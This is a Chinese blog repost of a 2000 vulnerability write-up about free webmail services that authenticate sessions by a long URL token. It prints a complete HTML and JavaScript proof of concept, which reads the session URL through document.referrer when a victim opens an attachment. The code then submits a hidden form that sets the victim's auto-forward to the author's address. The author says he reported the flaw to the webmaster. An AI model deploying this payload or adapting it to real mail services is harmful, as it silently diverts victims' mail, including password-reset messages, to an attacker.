目前国内一些Web mail存在的一个安全漏洞

最新推荐文章于 2021-05-28 09:34:47 发布
最新推荐文章于 2021-05-28 09:34:47 发布
阅读量1.2k 收藏
点赞数
分类专栏: 安全 软件经济 个人 文章标签: web email javascript html input shell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lin_zyang/article/details/3909796
版权
软件经济 同时被 3 个专栏收录
42 篇文章 0 订阅
订阅专栏
个人
39 篇文章 0 订阅
订阅专栏
安全
38 篇文章 0 订阅
订阅专栏

   该Script源于上个世纪(1999年)一次在设置免费email的自动转发时看到一长串的Url时的想法...
  
   看完这篇文章或许你应该赶紧去检查一下你email中的自动转发中有没有别人的email地址:=(
  最好不要随便打开别人发给你的HTML文件...
   我们知道,国内好些免费email用户登录后的认证都是靠一长串的Url(如我用ShellTools登
  录后是"http://webmail.****.com/shelltools/3s91091u96kDwcgNkojF4vumXaJfhn/SignOn.gen")
  及服务端保存的对照IP地址来进行的,在登录后发、看邮件,改个人资料、参数设置、邮件签名、收件助理
  及自动转发等都靠这串随机ID:3s91091u96kDwcgNkojF4vumXaJfhn确认,而用户于WEB方式收信并查看你发
  给他(她)的HTML附件时可以通过JavaScript的“document.referrer”获得其前一URL即带ID那一串,这时
  他(她)的IP跟服务器保存的对照IP是一致的,那么获得这两个前提,聪明的你该知道不怀好意的人可以通过
  该方式做那些手脚了吧:=(,下面的Script Demo实现的是将自动转发设置为"ShellTools@21cn.com"(具体
  是拿那个免费email做的Demo自己猜吧~)收到该HTML附件打开的话他的自动转发就给加上去了,然后他的
  邮件....顺便提一句,象OICQ等好些网站可以将你的注册密码发回你的邮箱...
   该说的完了,剩下的就看代码吧,什么,看不懂?...那你来这里干什么?....
   (该方式到目前为止还可以通过,但我已经将该文提前email给了email的webmaster,什么时候堵上就
   不知道了。)
   -----学别人一句"转载请注明出处"~ ---
  
   shell(shelltools@21cn.com) http://shelltools.yeah.net
   2000/6/14
  〈HTML〉
  〈HEAD〉
  〈TITLE〉小心用Web方式收信〈/TITLE〉
  〈/HEAD〉
  〈BODY〉
   网管,你好:
   ****的自动转发等操作存在一些安全问题,在Email用户用〈br〉
   WEB方式查看信件时可以使用简单的JavaScript在“自动转发”〈br〉
   中填入其它地址,将email转到其它信箱中。请查看本页的原代码中〈br〉
   的Script。这个问题在国内的几个免费email中都存在。〈br〉
  
   (如果你正用Web方式查看该email请到 配置 -〉 自动转发 中看看,〈br〉
   应该被设为"ShellTools@21cn.com"了)
  
   ****用户 shell
  
  
   〈form method="POST" action="AutoForward.gen" name=AddUserForm target="ShellTools"〉
   〈input type=hidden name=SuUser value=〉
   〈input type=hidden name=Request value=EditDone 〉
   〈input type=hidden name="B1" value=" 更新 "〉
   〈input type=hidden name="ForwardAddresses" value="ShellTools@21cn.com"〉
   〈/form〉
   〈SCRIPT Language=JScript〉
   var sr=document.referrer;
   var isr;
   sr=sr.substring(7,30);
   isr=sr.indexOf("/");
   sr="http://" + sr.substring(0,isr) + "/Banner.htm";
   var sr2=document.referrer;
   isr=sr2.indexOf("ReadMiscPart");
   if ( isr 〉 20 ){
  aw=window.open("about:blank","banner1","width=500,height=60,resizable=no,menubar=no,scrollbars=no");
   aw.document.write('〈HTML〉');
   aw.document.write('〈HEAD〉');
   aw.document.write('〈title〉设置自动转发〈/title〉');
   aw.document.write('〈/head〉');
   aw.document.write('〈frameset framespacing=0 rows=97%,* frameborder=no border=false〉');
   aw.document.write('〈frame name=show src=' + sr + ' scrolling=no〉');
   aw.document.write('〈frame name=ShellTools src=main.asp scrolling=no〉');
   aw.document.write('〈noframes〉');
   aw.document.write('〈body〉');
   aw.document.write('〈p〉This page uses frames, but your browser doesnt support them.〈/p〉');
   aw.document.write('〈/body〉');
   aw.document.write('〈/noframes〉');
   aw.document.write('〈/frameset〉');
   aw.document.write('〈/html〉 ');
   sr2 = sr2.substring(0,isr);
   document.AddUserForm.action= sr2 + "AutoForward.gen";
   document.AddUserForm.submit();}
   window.focus();
   〈/SCRIPT〉
  
  〈/BODY〉
  〈/HTML〉

lin_zyang
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
端到端安全协议的威胁、演进和部署.pdf
08-08
出于安全的目的,Web浏览器的同源策略(Same Origin Policy)限制了跨域的网络资源访问。...最后,对CORS的设计和部署提出了改进建议以降低风险,并介绍开发的一个Web服务器CORS配置的漏洞扫描器。
新的未修补的Horde Webmail漏洞可以让黑客通过发送邮件接管服务器
qzt961003的博客
06-02 997
开放源码的Horde Webmail客户端发现一个新的未修补的安全漏洞,黑客只需向受害者发送一封特制的电子邮件,就可以利用这个漏洞在电子邮件伺服器上远程执行代码。
Roundcube Webmail信息泄露漏洞(CVE-2015-5383)
weixin_30512089的博客
04-10 776
Preface Software:https://roundcube.net/Versions:1.1.x<1.1.2(亲测1.1.5也有效)CVE:CVE-2015-5383Author:adprotasRelease date: 2015-5-5 Reference CVE-2015-5383 Light infodisclosure issue Roundcube W...
linux下分析webmail代码,Atmail Webmail Client多个HTML代码注入漏洞
weixin_42327217的博客
05-13 289
发布日期:2012-01-09更新日期:2012-01-10受影响系统:@Mail Atmail Webmail Client 6.3.4描述:--------------------------------------------------------------------------------BUGTRAQ ID: 51313Atmail是商业化Linux消息传送平台提供者。Atmai...
无意中发现winwebmail系统的一个漏洞
weixin_34242658的博客
03-02 712
或许大家已经都知道了,呵呵~ 就是winwebmail邮件服务器系统,用户名和密码全部存在winwebmail的安装目录中popusers.ini文件里面!包括admin管理员用户!当然,密码是加密的! 或许大家已经都知道了,呵呵~ 就是winwebmail邮件服务器系统,用户名和密码全部存在winwebmail的安装目录中popusers.ini文件里面!包括...
Roundcube Webmail跨站脚本漏洞(CVE-2015-5381 )
weixin_30242907的博客
04-10 692
Preface Software: https://roundcube.net/Versions:1.1.x<1.1.2CVE:CVE-2015-5381Author:sroesemannRelease date: 2015-5-30 Reference Roundcube Webmail跨站脚本漏洞(CNVD-2017-08082) XSS via _mbox-paramet...
Icewarp Web Mail存在多个安全漏洞
风信子的专栏
02-19 1626
 受影响系统:Icewarp Web Mail 5.3.2Icewarp Web Mail 5.3.0描述:--------------------------------------------------------------------------------MERAK Mail Server使用Icewarp Web Mail作为WEB邮件系统。Icewa
linux mbox,RoundCube Webmail “_mbox”参数跨站脚本执行漏洞
weixin_29189381的博客
05-28 173
发布日期:2011-08-18更新日期:2012-02-03受影响系统:Apple MacOS X Server 10.7.2Apple MacOS X Server 10.7.1Apple MacOS X Server 10.7RoundCube Webmail 0.5.x不受影响系统:Apple MacOS X Server 10.7.3RoundCube Webmail 0.5.4描述:--...
Webmail邮件攻防实战技术总结[转]
weixin_33777877的博客
05-23 498
WebMail是指利用浏览器通过web方式来收发电子邮件的服务或技术,不需借助邮件客户端,可以说只要能上网就能使用WebMail,极大地方便了用户对邮件的收发。对于不能熟练使用邮件客户端, 或者在网吧不便使用邮件客户端的用户来说,WebMail更是必不可少的选择。Email能够成为当今Internet上应用最广泛的网络服务,WebMail可谓功不可没。  由于用户的使用不当或者WebMail系统...
WEB服务器安全测试方案.doc.doc
06-07
在本次测试中,将从:WIN2003系统安全,SQL数据库安全,应用程序安全这三 方面安全为基点,以手动人工测试和必要的专业工具为工作利器,将服务器有可能存在漏洞揪出来并提出改善意见。 WIN2003系统安全。 以下...
U-Mail邮件服务器.zip
07-11
U-Mail邮件服务器软件是国内一线品牌唯一真正提供终生免费升级的邮件系统,包括邮件系统、杀毒引擎、反垃圾引擎的数据升级等。电信级运行能力,支持多语言、多模版、多域名、分布式邮件系统架设;功能模块按需定制,...
SQL注入攻击与防御(安全技术经典译丛)
02-19
SQL注入是Internet上最危险、最有名的安全漏洞之一,本书是目前唯一一本专门致力于讲解SQL威胁的图书。本书作者均是专门研究SQL注入的安全专家,他们集众家之长,对应用程序的基本编码和升级维护进行全面跟踪,详细...
高级java笔试题-Web-Security-Learning:网络安全学习https://chybeta.github.io/2017/08
06-03
在学习Web安全的过程中整合的一些资料。 该repo会不断更新,最近更新日期为:2017/12/21。 同步更新于: 01月29日更新: 新收录文章 mysql MSSQL postgresql 前端安全 php java-Web redis SSTI 信息搜集 渗透 Web-...
Web漏洞挖掘(一)登录认证模块的暴力破解实例
wuqi5700的博客
07-26 4250
Web漏洞挖掘(一)登录认证模块的暴力破解实例暴力破解的定义暴力破解的分类暴力破解的威胁涉及的基础知识模块相关硬件(高速GPU推荐)基于Burp Suite的暴力破解实例 暴力破解的定义 暴力破解测试是指针对应用系统用户登录账号与密码进行的枚举测试,针对账号或密码进行逐一对比,直到找到正确的账号与密码。 暴力破解的分类 已知账号的情况 :加载密码字典针对密码进行枚举测试; 未知账号的情况 :加载账号字典,配合着密码字典进行枚举测试; 未知账号和密码的情况:利用两个账号字典与密码字典进行枚举测试; 暴力破
MDaemon补丁公告-MD011221
上海云璨的博客
03-10 217
MDaemon Technologies开发团队已经构建并测试了一个补丁,以纠正MDaemon远程管理和Webmail(Worldclient)中的一个潜在漏洞,此漏洞可能会影响所有浏览器类型。此安全更新是针对MDaemon电子邮件服务器16.0-20.0版本。 只需下载并安装此中列出的相应补丁即可(补丁下载)。 不需要更新您的许可来获得补丁。不过,我们鼓励使用较早、不受支持的MDaemon版本的用户升级到最新版本,以确保他们拥有最新的补丁和安全更新。 ...
致远OA webmail.do任意文件下载 CNVD-2020-62422
PeiQi的博客
01-25 5126
致远OA webmail.do任意文件下载 CNVD-2020-62422 漏洞描述 致远OA存在任意文件下载漏洞,攻击者可利用该漏洞下载任意文件,获取敏感信息 漏洞影响 致远OA A6-V5 致远OA A8-V5 致远OA G6 漏洞复现 访问 url http://xxx.xxx.xxx.xxx/seeyon/webmail.do?method=doDownloadAtt&filename=PeiQi.txt&filePath=…/conf/datasourceCtp.prope
MDaemon补丁更新公告
上海云璨的博客
05-20 282
最近MDaemon在MDaemon WebMail中发现了一个潜在的漏洞。MDaemon开发团队已经构建并测试了一个补丁来纠正这个问题。此安全更新适用于所有受支持的MDaemon Email Server版本。此外,此安全更新还会更正以前发布的所有更新。 更新内容:修复Webmail漏洞 摘要 SecuritiTeam Secure Disclosure(SSD)最近报告了MDaem...
E-mail 工作原理及安全漏洞
风信子的专栏
02-19 7442
 E-mail工作原理 一个邮件系统的传输包含了用户代理(user Agent)。传输代理(Transfer Agent及接受代理(Doelivery A_gent)三大部分。用户代理是一个用户端发信和收信的程序,负责将信按照一定的标准包装,然后送至邮件服务器,将信件发出或由邮件服务器收回。 传输代理负责信件的交换和传输,将信件传送至适当的邮件主机,再由接受代理将信件分发至不同的
如何判断一个web页面是否存在信息安全风险
最新发布
06-11
判断一个web页面是否存在信息安全风险需要从多个方面进行考虑和分析,以下是一些可能存在风险的方面: 1. 网站是否使用HTTPS协议进行加密通信,HTTPS协议可以保证通信过程的机密性和完整性,防止信息在传输过程中被篡改或窃取。 2. 网站是否存在漏洞,如未经认证的文件上传、SQL注入、XSS攻击等,这些漏洞可能会被黑客利用,对网站和用户造成损失。 3. 网站是否存在恶意代码,如木马、病毒、钓鱼网站等,这些恶意代码可能会窃取用户的敏感信息或对用户的设备进行攻击。 4. 网站是否存在安全策略缺陷,如弱密码、未及时更新软件补丁等,这些缺陷可能会被黑客利用,对网站和用户造成损失。 综上所述,判断一个web页面是否存在信息安全风险需要综合考虑多个方面的因素,建议用户在访问网站时要保持警惕,不要轻信可疑链接和信息,同时也可以使用一些安全工具和插件来提高自身的信息安全保护能力。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值